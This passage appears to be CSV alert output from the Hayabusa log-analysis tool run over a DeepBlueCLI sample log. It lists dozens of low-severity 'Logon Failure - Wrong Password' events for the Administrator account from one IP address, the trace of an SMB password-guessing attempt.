NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXGm63wiZz3ZYFb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: izvPgZCO2GRVLhId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iI9zO2o7jd922pfK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnAGy86My6hVwt4J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhFTzONSVEziRtgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdEv4ooC8AApqU1T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxFGRBKVK732Aeu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITg8QH90LKkAQMLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8YKCN2uxmJtYxdW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lcVIqrTQbNLFW7Cr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: taZx68l1ci0i2XB0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Jjy0gZhZCc9dVGd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S1DxOWcNytmxHfxl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGRFWos3MJeQ0oAr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I3YXVTiQAGbf57TH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eWNsBwoGd36krY2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HIobpWCoOHdD76lL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W91ruUEdXwRcMxVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6PEs7fp97cYFf4vx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQelUX0kwLfpJnr0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t88CBspQqbiO1IPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zELW2Upo3jRCIqJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfcyJGLYmu93JBIL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3t2nKPZHZvcXM3QA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oiDRonqdEM2YJvz9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wJPF4GUypkDkTz56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cd5YRVIoXx8LoYpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H49I2Xp2Gz1Jj0Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMSWWzskoRfYBGny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLm2PolKMBsYkPnN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZjHWhG2rXzYWskz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FOZzVedHYODB5Yvd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVaRybjI4HdZV0Zs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tTcl30MvvycjFcQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVZqbCr9EwmV4gNE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zVwhii0TVmCkpDI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Tx04CPPVa6WYY9G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gHyefIGqhIIy3ZI9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wrietoh4wgXcEvNd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9WW0Y5PW2JfCCdyR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmXsMJ0ELK4qiNY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeftUqriSoxCgmDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60JE9WQQ8N00j65B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0rt2yVAEH6V4IIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pay98C2Gr1di7qQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8TyPDYm9QCAmqj7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Dw3iK7DQMVXy8LW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BMuO0QEkxpKRv4Vl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaHECaQDXCXQc9Xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ewXT2VcARiaNLIxJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGSTrm4AOojs7So0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wVTBSk0Q65LkaTqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NjFN51w3T4VwuWa5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KG7a88h48ZEyOuYw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ksKuTSGukc5em3B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPEMcGV6ZR92sWNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iBQ6sKrRjb7BsySN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gDFnG1gv7jOeIQ0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdFKkcNpkfAScnkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IAYbV4ioewwkZSmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bQ2Dxd6nlgSXJpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: havLyoVCfdCqzrqO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b2vZLhz19pXrq9iE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4TSN93DrSWb1ah4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QwFyrxiceLRTD9rI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARbqo84Mr5T3ltRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34HpQJO17IDWber9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bSSbqOtdSeH58oIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EMvTo7fU6J468WE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8gzx6Vr9LoInM1df | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwXC2S4HwdwNE6SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pQa1WxSt3bj9LEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fm65jq9tRQznmWPh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd8BJbXvEoaDADLc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P0JlFw7S6jFUt4Iy | IP Addr: 192.168.198.149 | AuthPackage: 